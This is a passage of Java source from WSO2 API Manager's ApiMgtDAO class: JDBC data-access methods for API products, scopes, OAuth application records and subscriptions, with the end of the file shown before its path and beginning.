"VALUES (?, ?)"; prepStmtAddResourceMapping = connection.prepareStatement(queryAddResourceMapping); String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; prepStmtAddScopeResourceMapping = connection.prepareStatement(queryAddScopeResourceMapping); //add the resources in each API in the API product. 
Add the resource_ma List<APIProductResource> productApis = apiproduct.getProductResources(); for (APIProductResource apiProductResource : productApis) { APIIdentifier apiIdentifier = apiProductResource.getApiIdentifier(); int apiID = getAPIID(apiIdentifier, connection); prepStmtAddScopeLink.setInt(1, apiID); prepStmtAddScopeLink.setInt(2, scopeId); prepStmtAddScopeLink.addBatch(); List<URITemplate> uriTemplates = apiProductResource.getResources(); for (URITemplate uriTemplate : uriTemplates) { prepStmtAddResourceMapping.setInt(1, productId); prepStmtAddResourceMapping.setInt(2, uriTemplate.getId()); prepStmtAddResourceMapping.addBatch(); //add scope uri temaplate mapping String resourceKey = APIUtil .getResourceKey(getAPIContext(apiIdentifier), apiIdentifier.getVersion(), uriTemplate.getResourceURI(), uriTemplate.getHTTPVerb()); prepStmtAddScopeResourceMapping.setString(1, resourceKey); prepStmtAddScopeResourceMapping.setInt(2, scopeId); prepStmtAddScopeResourceMapping.setInt(3, APIUtil.getTenantIdFromTenantDomain(tenantDomain)); prepStmtAddScopeResourceMapping.addBatch(); } } prepStmtAddScopeLink.executeBatch(); prepStmtAddScopeLink.clearBatch(); prepStmtAddResourceMapping.executeBatch(); prepStmtAddResourceMapping.clearBatch(); prepStmtAddScopeResourceMapping.executeBatch(); prepStmtAddScopeResourceMapping.clearBatch(); connection.commit(); } catch (SQLException e) { handleException("Error while adding API product " + apiproduct.getName() + " of provider " + apiproduct.getProvider(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddAPIProduct, null, null); APIMgtDBUtil.closeAllConnections(prepStmtAddResourceMapping, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeEntry, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeLink, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeResourceMapping, connection, null); } } public APIProduct getAPIProduct(String uuid) throws APIManagementException { APIProduct product = new APIProduct(); Connection connection = null; PreparedStatement prepStmtGetAPIProduct = null; PreparedStatement prepStmtGetAPIProductResource = null; ResultSet rs = null; ResultSet rs2 = null; try { connection = APIMgtDBUtil.getConnection(); //TODO check this //TODO move to constant String queryGetAPIProduct = "SELECT API_PRODUCT_ID,UUID,DESCRIPTION,API_PRODUCT_PROVIDER,API_PRODUCT_NAME,API_PRODUCT_TIER,VISIBILITY,BUSINESS_OWNER,BUSINESS_OWNER_EMAIL,SUBSCRIPTION_AVAILABILITY,STATE FROM AM_API_PRODUCT WHERE UUID = ?"; int productId = 0; prepStmtGetAPIProduct = connection.prepareStatement(queryGetAPIProduct); prepStmtGetAPIProduct.setString(1, uuid); rs = prepStmtGetAPIProduct.executeQuery(); if (rs.next()) { product.setUuid(rs.getString("UUID")); product.setDescription(rs.getString("DESCRIPTION")); product.setProvider(rs.getString("API_PRODUCT_PROVIDER")); product.setName(rs.getString("API_PRODUCT_NAME")); product.setProductTier(rs.getString("API_PRODUCT_TIER")); product.setVisibility(rs.getString("VISIBILITY")); product.setBusinessOwner(rs.getString("BUSINESS_OWNER")); product.setBusinessOwnerEmail(rs.getString("BUSINESS_OWNER_EMAIL")); product.setSubscriptionAvailability(rs.getString("SUBSCRIPTION_AVAILABILITY")); product.setState(rs.getString("STATE")); productId = rs.getInt("API_PRODUCT_ID"); } //get api resources related to api product //TODO move to constant String queryListProductResourceMapping = "SELECT API_NAME, API_PROVIDER , API_VERSION ,T1.API_ID ,API_PRODUCT_ID, HTTP_METHOD, URL_PATTERN, " + 
"T1.URL_MAPPING_ID " + "FROM " + "(SELECT API_NAME ,API_PROVIDER, API_VERSION, API.API_ID,URL.URL_MAPPING_ID " + "FROM AM_API_URL_MAPPING URL, AM_API API " + "WHERE API.API_ID = URL.API_ID) T1 " + "INNER JOIN " + "(SELECT API_PRODUCT_ID, HTTP_METHOD, URL_PATTERN, URL.URL_MAPPING_ID " + "FROM AM_API_PRODUCT_MAPPING PRODUCT, AM_API_URL_MAPPING URL " + "WHERE URL.URL_MAPPING_ID = PRODUCT.URL_MAPPING_ID AND API_PRODUCT_ID =? ) T2 " + "ON " + "(T1.URL_MAPPING_ID =T2.URL_MAPPING_ID )"; prepStmtGetAPIProductResource = connection.prepareStatement(queryListProductResourceMapping); prepStmtGetAPIProductResource.setInt(1, productId); //keep a temporary map for each resources for each api in the product Map<String, APIProductResource> resourceMap = new HashMap<String, APIProductResource>(); String apiId = ""; rs2 = prepStmtGetAPIProductResource.executeQuery(); while (rs2.next()) { apiId = rs2.getString("API_ID"); APIProductResource resource; if (resourceMap.containsKey(apiId)) { resource = resourceMap.get(apiId); } else { resource = new APIProductResource(); resource.setApiName(rs2.getString("API_NAME")); APIIdentifier identifier = new APIIdentifier(rs2.getString("API_PROVIDER"), rs2.getString("API_NAME"), rs2.getString("API_VERSION")); resource.setApiId(identifier.toString()); // TODO set API UUID resource.setApiIdentifier(identifier); } URITemplate template = new URITemplate(); template.setHTTPVerb(rs2.getString("HTTP_METHOD")); template.setResourceURI(rs2.getString("URL_PATTERN")); template.setId(rs2.getInt("URL_MAPPING_ID")); resource.setResource(template); resourceMap.put(apiId, resource); } product.setProductResources(new ArrayList<APIProductResource>(resourceMap.values())); } catch (SQLException e) { handleException("Error while retrieving api product for UUID " + uuid , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProduct, null, rs); APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProductResource, connection, rs2); } return product; } public List<APIProduct> getAPIProductsForTenantDomain(String tenantDomain) throws APIManagementException { List<APIProduct> productList = new ArrayList<APIProduct>(); Connection connection = null; PreparedStatement prepStmtGetAPIProduct = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); //TODO move to constant String queryGetAPIProduct = "SELECT API_PRODUCT_ID,UUID,DESCRIPTION,API_PRODUCT_PROVIDER,API_PRODUCT_NAME,API_PRODUCT_TIER,VISIBILITY,BUSINESS_OWNER,BUSINESS_OWNER_EMAIL,SUBSCRIPTION_AVAILABILITY,TENANT_DOMAIN,STATE FROM AM_API_PRODUCT WHERE TENANT_DOMAIN = ?"; prepStmtGetAPIProduct = connection.prepareStatement(queryGetAPIProduct); prepStmtGetAPIProduct.setString(1, tenantDomain); rs = prepStmtGetAPIProduct.executeQuery(); while (rs.next()) { APIProduct product = new APIProduct(); //only send a product.setName(rs.getString("API_PRODUCT_NAME")); product.setUuid(rs.getString("UUID")); product.setProvider(rs.getString("API_PRODUCT_PROVIDER")); product.setState(rs.getString("STATE")); productList.add(product); } } catch (SQLException e) { handleException("Error while retrieving api product for tenant " + tenantDomain , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProduct, connection, rs); } return productList; } public void deleteAPIProduct(String uuid, String tenantDomain) throws APIManagementException { String deleteQuery = "DELETE FROM AM_API_PRODUCT WHERE UUID = ? 
AND TENANT_DOMAIN = ?"; PreparedStatement ps = null; Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(deleteQuery); ps.setString(1, uuid); ps.setString(2, tenantDomain); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting api product " + uuid + " tenant " + tenantDomain , e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } private void deleteProductMappingsForAPI(API api, List<APIProduct> apiProducts) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; String querydeleteProductMappingsForAPI = "DELETE FROM AM_API_PRODUCT_MAPPING WHERE URL_MAPPING_ID = ?"; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); preparedStatement = connection.prepareStatement(querydeleteProductMappingsForAPI); for (APIProduct apiProduct : apiProducts) { List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { if (productResource.getApiIdentifier().equals(api.getId())) { //TODO: check and modify to use UUID List<URITemplate> mappedAPIResources = productResource.getResources(); if (mappedAPIResources.size() > 0 && log.isDebugEnabled()) { log.debug( "Removing url mappings from API : " + api.getId().toString() + " on API product : " + apiProduct.getName()); } for (URITemplate template : mappedAPIResources) { preparedStatement.setInt(1, template.getId()); preparedStatement.addBatch(); } } } } preparedStatement.executeBatch(); preparedStatement.clearBatch(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on API product mapping updating", e1); } } handleException("Error occured while removing url template mappings from API " + api.getId().toString() + " on API Products.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, null); } } private void addProductMappingsForAPI(API api, List<APIProduct> apiProducts) throws APIManagementException { Connection connection = null; String queryAddProductResourceMappings = "INSERT INTO AM_API_PRODUCT_MAPPING (API_PRODUCT_ID,URL_MAPPING_ID) " + "VALUES (?, ?)"; String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String queryAddcopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; PreparedStatement prepStmtAddProductResourceMappings = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmtAddProductResourceMappings = connection.prepareStatement(queryAddProductResourceMappings); //get previously added resources and re-add them to product with new URL_MAPPING_ID Map<String, URITemplate> templateMap = getURITemplatesForAPI(api); int productId; for (APIProduct apiProduct : apiProducts) { productId = getAPIProductId(apiProduct.getName(), apiProduct.getProvider(), null); List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { if (api.getId().equals(productResource.getApiIdentifier())) { List<URITemplate> templates = productResource.getResources(); for (URITemplate template : templates) { String key = template.getHTTPVerb() + ":" + template.getResourceURI(); if 
(templateMap.containsKey(key)) { //update api template mapping id template.setId(templateMap.get(key).getId()); //add record to database back with new ID prepStmtAddProductResourceMappings.setInt(1, productId); prepStmtAddProductResourceMappings.setInt(2, template.getId()); prepStmtAddProductResourceMappings.addBatch(); } else { //ToDo : what if the resource had been deleted while updating API log.info("Resource " + key + " was deleted from API " + api.getId().toString() + " while updating the API. So it is no longer available with API product " + apiProduct.getName()); } } } } } prepStmtAddProductResourceMappings.executeBatch(); prepStmtAddProductResourceMappings.clearBatch(); connection.commit(); } catch (SQLException e) { } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddProductResourceMappings, connection, null); } } private int getAPIProductId(String productName, String provider, String version) throws APIManagementException { Connection conn = null; //TODO: move query to constants. Use version for now I am not using version in the query since it is still set to null String queryGetProductId = "SELECT API_PRODUCT_ID FROM AM_API_PRODUCT WHERE API_PRODUCT_NAME = ? AND " + "API_PRODUCT_PROVIDER = ?"; PreparedStatement preparedStatement = null; ResultSet rs = null; int productId = -1; try { conn = APIMgtDBUtil.getConnection(); preparedStatement = conn.prepareStatement(queryGetProductId); preparedStatement.setString(1, productName); preparedStatement.setString(2, provider); rs = preparedStatement.executeQuery(); if (rs.next()) { productId = rs.getInt("API_PRODUCT_ID"); } if (productId == -1) { String msg = "Unable to find the API Product : " + productId + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while retrieving api product id for product " + productName + " by " + provider, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, conn, rs); } return productId; } private void addProductScopes(List<APIProduct> apiProducts, int tenantID) throws APIManagementException { Connection connection = null; String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String queryAddcopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; PreparedStatement prepStmtAddScopeEntry = null; PreparedStatement prepStmtAddcopeLink = null; PreparedStatement prepStmtAddScopeResourceMapping = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); prepStmtAddScopeEntry = connection.prepareStatement(queryAddScopeEntry, new String[] { "scope_id" }); prepStmtAddcopeLink = connection.prepareStatement(queryAddcopeLink); prepStmtAddScopeResourceMapping = connection.prepareStatement(queryAddScopeResourceMapping); for (APIProduct apiProduct : apiProducts) { //add product scope //TODO finalize format and move to constants String productScopeKey = "productscope-" + apiProduct.getName() + ":" + apiProduct.getProvider(); //for now use key for display name as well TODO check and modify String productScopeDisplayName = productScopeKey; Scope productScope = new Scope(); productScope.setKey(productScopeKey); productScope.setName(productScopeDisplayName); int scopeId = 0; prepStmtAddScopeEntry.setString(1, productScope.getKey()); prepStmtAddScopeEntry.setString(2, productScope.getName()); prepStmtAddScopeEntry.setString(3, productScope.getDescription()); prepStmtAddScopeEntry.setInt(4, tenantID); prepStmtAddScopeEntry.execute(); rs = 
prepStmtAddScopeEntry.getGeneratedKeys(); if (rs.next()) { scopeId = rs.getInt(1); } //breaks the flow if product scope is not added to the db correctly if (scopeId == 0) { throw new APIManagementException( "Error while adding scope for API product : " + apiProduct.getUuid()); } productScope.setId(scopeId); //attach product scope to each resource api List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { APIIdentifier apiIdentifier = productResource.getApiIdentifier(); prepStmtAddcopeLink.setInt(1, getAPIID(apiIdentifier, connection)); prepStmtAddcopeLink.setInt(2, scopeId); prepStmtAddcopeLink.addBatch(); //attach product scope to resource mappings List<URITemplate> templates = productResource.getResources(); for (URITemplate template : templates) { //add scope uri temaplate mapping String resourceKey = APIUtil .getResourceKey(getAPIContext(apiIdentifier), apiIdentifier.getVersion(), template.getResourceURI(), template.getHTTPVerb()); prepStmtAddScopeResourceMapping.setString(1, resourceKey); prepStmtAddScopeResourceMapping.setInt(2, scopeId); prepStmtAddScopeResourceMapping.setInt(3, tenantID); prepStmtAddScopeResourceMapping.addBatch(); } } } prepStmtAddcopeLink.executeBatch(); prepStmtAddcopeLink.clearBatch(); prepStmtAddScopeResourceMapping.executeBatch(); prepStmtAddScopeResourceMapping.clearBatch(); connection.commit(); } catch (SQLException e) { handleException("Error while adding product resource and scope mappings for api product ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddScopeEntry, connection, rs); APIMgtDBUtil.closeAllConnections(prepStmtAddcopeLink, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeResourceMapping, connection, null); } } }
components/apimgt/org.wso2.carbon.apimgt.impl/src/main/java/org/wso2/carbon/apimgt/impl/dao/ApiMgtDAO.java
/* * Copyright (c) 2005-2011, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * WSO2 Inc. licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file except * in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.wso2.carbon.apimgt.impl.dao; import com.google.common.base.Splitter; import com.google.common.collect.Lists; import org.apache.commons.lang.StringUtils; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.wso2.carbon.apimgt.api.APIManagementException; import org.wso2.carbon.apimgt.api.BlockConditionAlreadyExistsException; import org.wso2.carbon.apimgt.api.SubscriptionAlreadyExistingException; import org.wso2.carbon.apimgt.api.dto.ConditionDTO; import org.wso2.carbon.apimgt.api.dto.ConditionGroupDTO; import org.wso2.carbon.apimgt.api.dto.UserApplicationAPIUsage; import org.wso2.carbon.apimgt.api.model.API; import org.wso2.carbon.apimgt.api.model.APIIdentifier; import org.wso2.carbon.apimgt.api.model.APIKey; import org.wso2.carbon.apimgt.api.model.APIProduct; import org.wso2.carbon.apimgt.api.model.APIProductIdentifier; import org.wso2.carbon.apimgt.api.model.APIProductResource; import org.wso2.carbon.apimgt.api.model.APIStatus; import org.wso2.carbon.apimgt.api.model.APIStore; import org.wso2.carbon.apimgt.api.model.AccessTokenInfo; import org.wso2.carbon.apimgt.api.model.Application; import org.wso2.carbon.apimgt.api.model.ApplicationConstants; import org.wso2.carbon.apimgt.api.model.BlockConditionsDTO; import org.wso2.carbon.apimgt.api.model.Comment; import org.wso2.carbon.apimgt.api.model.KeyManager; import org.wso2.carbon.apimgt.api.model.Label; import org.wso2.carbon.apimgt.api.model.LifeCycleEvent; import org.wso2.carbon.apimgt.api.model.OAuthAppRequest; import org.wso2.carbon.apimgt.api.model.OAuthApplicationInfo; import org.wso2.carbon.apimgt.api.model.Scope; import org.wso2.carbon.apimgt.api.model.SubscribedAPI; import org.wso2.carbon.apimgt.api.model.Subscriber; import org.wso2.carbon.apimgt.api.model.Tier; import org.wso2.carbon.apimgt.api.model.URITemplate; import org.wso2.carbon.apimgt.api.model.policy.APIPolicy; import org.wso2.carbon.apimgt.api.model.policy.ApplicationPolicy; import org.wso2.carbon.apimgt.api.model.policy.BandwidthLimit; import org.wso2.carbon.apimgt.api.model.policy.Condition; import org.wso2.carbon.apimgt.api.model.policy.GlobalPolicy; import org.wso2.carbon.apimgt.api.model.policy.HeaderCondition; import org.wso2.carbon.apimgt.api.model.policy.IPCondition; import org.wso2.carbon.apimgt.api.model.policy.JWTClaimsCondition; import org.wso2.carbon.apimgt.api.model.policy.Pipeline; import org.wso2.carbon.apimgt.api.model.policy.Policy; import org.wso2.carbon.apimgt.api.model.policy.PolicyConstants; import org.wso2.carbon.apimgt.api.model.policy.QueryParameterCondition; import org.wso2.carbon.apimgt.api.model.policy.QuotaPolicy; import org.wso2.carbon.apimgt.api.model.policy.RequestCountLimit; import org.wso2.carbon.apimgt.api.model.policy.SubscriptionPolicy; import org.wso2.carbon.apimgt.impl.APIConstants; import 
org.wso2.carbon.apimgt.impl.APIManagerConfiguration; import org.wso2.carbon.apimgt.impl.ThrottlePolicyConstants; import org.wso2.carbon.apimgt.impl.dao.constants.SQLConstants; import org.wso2.carbon.apimgt.impl.dto.APIInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APIKeyInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APIKeyValidationInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APISubscriptionInfoDTO; import org.wso2.carbon.apimgt.impl.dto.ApplicationRegistrationWorkflowDTO; import org.wso2.carbon.apimgt.impl.dto.TierPermissionDTO; import org.wso2.carbon.apimgt.impl.dto.WorkflowDTO; import org.wso2.carbon.apimgt.impl.factory.KeyManagerHolder; import org.wso2.carbon.apimgt.impl.factory.SQLConstantManagerFactory; import org.wso2.carbon.apimgt.impl.internal.ServiceReferenceHolder; import org.wso2.carbon.apimgt.impl.utils.APIMgtDBUtil; import org.wso2.carbon.apimgt.impl.utils.APIUtil; import org.wso2.carbon.apimgt.impl.utils.APIVersionComparator; import org.wso2.carbon.apimgt.impl.utils.ApplicationUtils; import org.wso2.carbon.apimgt.impl.utils.LRUCache; import org.wso2.carbon.apimgt.impl.utils.RemoteUserManagerClient; import org.wso2.carbon.apimgt.impl.workflow.WorkflowConstants; import org.wso2.carbon.apimgt.impl.workflow.WorkflowExecutorFactory; import org.wso2.carbon.apimgt.impl.workflow.WorkflowStatus; import org.wso2.carbon.core.util.CryptoException; import org.wso2.carbon.identity.core.util.IdentityTenantUtil; import org.wso2.carbon.identity.core.util.IdentityUtil; import org.wso2.carbon.identity.oauth.IdentityOAuthAdminException; import org.wso2.carbon.user.core.util.UserCoreUtil; import org.wso2.carbon.utils.DBUtils; import org.wso2.carbon.utils.multitenancy.MultitenantConstants; import org.wso2.carbon.utils.multitenancy.MultitenantUtils; import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; import java.math.BigDecimal; import java.nio.charset.Charset; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import java.sql.Timestamp; import java.sql.Types; import java.util.ArrayList; import java.util.Arrays; import java.util.Calendar; import java.util.Collections; import java.util.Comparator; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.List; import java.util.Map; import java.util.Set; import java.util.TreeMap; import java.util.TreeSet; import java.util.UUID; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * This class represent the ApiMgtDAO. */ public class ApiMgtDAO { private static final Log log = LogFactory.getLog(ApiMgtDAO.class); private static ApiMgtDAO INSTANCE = null; private boolean forceCaseInsensitiveComparisons = false; private boolean multiGroupAppSharingEnabled = false; private static boolean initialAutoCommit = false; private final Object scopeMutex = new Object(); private ApiMgtDAO() { APIManagerConfiguration configuration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration(); String caseSensitiveComparison = ServiceReferenceHolder.getInstance(). 
getAPIManagerConfigurationService().getAPIManagerConfiguration().getFirstProperty(APIConstants.API_STORE_FORCE_CI_COMPARISIONS); if (caseSensitiveComparison != null) { forceCaseInsensitiveComparisons = Boolean.parseBoolean(caseSensitiveComparison); } multiGroupAppSharingEnabled = APIUtil.isMultiGroupAppSharingEnabled(); } public List<String> getAPIVersionsMatchingApiName(String apiName, String username) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; List<String> versionList = new ArrayList<String>(); ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_VERSIONS_MATCHES_API_NAME_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiName); ps.setString(2, username); resultSet = ps.executeQuery(); while (resultSet.next()) { versionList.add(resultSet.getString("API_VERSION")); } } catch (SQLException e) { handleException("Failed to get API versions matches API name" + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return versionList; } /** * Method to get the instance of the ApiMgtDAO. * * @return {@link ApiMgtDAO} instance */ public static ApiMgtDAO getInstance() { if (INSTANCE == null) { INSTANCE = new ApiMgtDAO(); } return INSTANCE; } /** * Persist the details of the token generation request (allowed domains & validity period) to be used back * when approval has been granted. * * @param dto DTO related to Application Registration. * @param onlyKeyMappingEntry When this flag is enabled, only AM_APPLICATION_KEY_MAPPING will get affected. * @throws APIManagementException if failed to create entries in AM_APPLICATION_REGISTRATION and * AM_APPLICATION_KEY_MAPPING tables. */ public void createApplicationRegistrationEntry(ApplicationRegistrationWorkflowDTO dto, boolean onlyKeyMappingEntry) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement queryPs = null; PreparedStatement appRegPs = null; ResultSet resultSet = null; Application application = dto.getApplication(); Subscriber subscriber = application.getSubscriber(); String jsonString = dto.getAppInfoDTO().getOAuthApplicationInfo().getJsonString(); String registrationQuery = SQLConstants.GET_APPLICATION_REGISTRATION_SQL; String registrationEntry = SQLConstants.ADD_APPLICATION_REGISTRATION_SQL; String keyMappingEntry = SQLConstants.ADD_APPLICATION_KEY_MAPPING_SQL; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); queryPs = conn.prepareStatement(registrationQuery); queryPs.setInt(1, subscriber.getId()); queryPs.setInt(2, application.getId()); queryPs.setString(3, dto.getKeyType()); resultSet = queryPs.executeQuery(); if (resultSet.next()) { throw new APIManagementException("Application '" + application.getName() + "' is already registered."); } if (!onlyKeyMappingEntry) { appRegPs = conn.prepareStatement(registrationEntry); appRegPs.setInt(1, subscriber.getId()); appRegPs.setString(2, dto.getWorkflowReference()); appRegPs.setInt(3, application.getId()); appRegPs.setString(4, dto.getKeyType()); appRegPs.setString(5, dto.getDomainList()); appRegPs.setLong(6, dto.getValidityTime()); appRegPs.setString(7, (String) dto.getAppInfoDTO().getOAuthApplicationInfo().getParameter("tokenScope")); appRegPs.setString(8, jsonString); appRegPs.execute(); } ps = conn.prepareStatement(keyMappingEntry); ps.setInt(1, application.getId()); ps.setString(2, dto.getKeyType()); ps.setString(3, dto.getStatus().toString()); ps.execute(); conn.commit(); } catch (SQLException 
e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Application Registration", e1); } handleException("Error occurred while creating an " + "Application Registration Entry for Application : " + application.getName(), e); } finally { APIMgtDBUtil.closeStatement(queryPs); APIMgtDBUtil.closeStatement(appRegPs); APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } } public OAuthApplicationInfo getOAuthApplication(String consumerKey) throws APIManagementException { OAuthApplicationInfo oAuthApplicationInfo = new OAuthApplicationInfo(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_OAUTH_APPLICATION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); rs = ps.executeQuery(); while (rs.next()) { oAuthApplicationInfo.setClientId(consumerKey); oAuthApplicationInfo.setCallBackURL(rs.getString("CALLBACK_URL")); oAuthApplicationInfo.setClientSecret(APIUtil.decryptToken(rs.getString("CONSUMER_SECRET"))); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_REDIRECT_URIS, rs.getString ("CALLBACK_URL")); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_CLIENT_NAME, rs.getString("APP_NAME")); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_CLIENT_GRANT, rs.getString("GRANT_TYPES")); } } catch (SQLException e) { handleException("Error while executing SQL for getting OAuth application info", e); } catch (CryptoException e) { handleException("Unable to decrypt consumer secret of consumer key " + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return oAuthApplicationInfo; } /** * Get the creator of the OAuth App. * * @param consumerKey Client ID of the OAuth App * @return {@code Subscriber} with name and TenantId set. 
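*         ({@code null} when no application is registered under the given consumer key).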
* @throws APIManagementException */ public Subscriber getOwnerForConsumerApp(String consumerKey) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String username; Subscriber subscriber = null; String sqlQuery = SQLConstants.GET_OWNER_FOR_CONSUMER_APP_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); rs = ps.executeQuery(); while (rs.next()) { username = rs.getString("USERNAME"); String domainName = rs.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(username, domainName); subscriber = new Subscriber(endUsernameWithDomain); subscriber.setTenantId(rs.getInt("TENANT_ID")); } } catch (SQLException e) { handleException("Error while executing SQL for getting User Id : SQL " + sqlQuery, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return subscriber; } /** * Get Subscribed APIs for given userId * * @param userId id of the user * @return APIInfoDTO[] * @throws APIManagementException if failed to get Subscribed APIs */ public APIInfoDTO[] getSubscribedAPIsOfUser(String userId) throws APIManagementException { List<APIInfoDTO> apiInfoDTOList = new ArrayList<APIInfoDTO>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; //identify logged in user String loginUserName = getLoginUserName(userId); String tenantAwareUsername = MultitenantUtils.getTenantAwareUsername(loginUserName); int tenantId = APIUtil.getTenantId(loginUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, tenantAwareUsername); ps.setInt(2, tenantId); rs = ps.executeQuery(); while (rs.next()) { APIInfoDTO infoDTO = new APIInfoDTO(); infoDTO.setProviderId(APIUtil.replaceEmailDomain(rs.getString("API_PROVIDER"))); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setVersion(rs.getString("API_VERSION")); apiInfoDTOList.add(infoDTO); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiInfoDTOList.toArray(new APIInfoDTO[apiInfoDTOList.size()]); } /** * Get API key information for given API * * @param apiInfoDTO API info * @return APIKeyInfoDTO[] * @throws APIManagementException if failed to get key info for given API */ public APIKeyInfoDTO[] getSubscribedUsersForAPI(APIInfoDTO apiInfoDTO) throws APIManagementException { APIKeyInfoDTO[] apiKeyInfoDTOs = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; List<APIKeyInfoDTO> apiKeyInfoList = new ArrayList<APIKeyInfoDTO>(); String sqlQuery = SQLConstants.GET_SUBSCRIBED_USERS_FOR_API_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(apiInfoDTO.getProviderId())); ps.setString(2, apiInfoDTO.getApiName()); ps.setString(3, apiInfoDTO.getVersion()); rs = ps.executeQuery(); while (rs.next()) { String userId = rs.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID); APIKeyInfoDTO apiKeyInfoDTO = new APIKeyInfoDTO(); apiKeyInfoDTO.setUserId(userId); apiKeyInfoList.add(apiKeyInfoDTO); } apiKeyInfoDTOs = apiKeyInfoList.toArray(new APIKeyInfoDTO[apiKeyInfoList.size()]); } catch (SQLException e) { handleException("Error while executing 
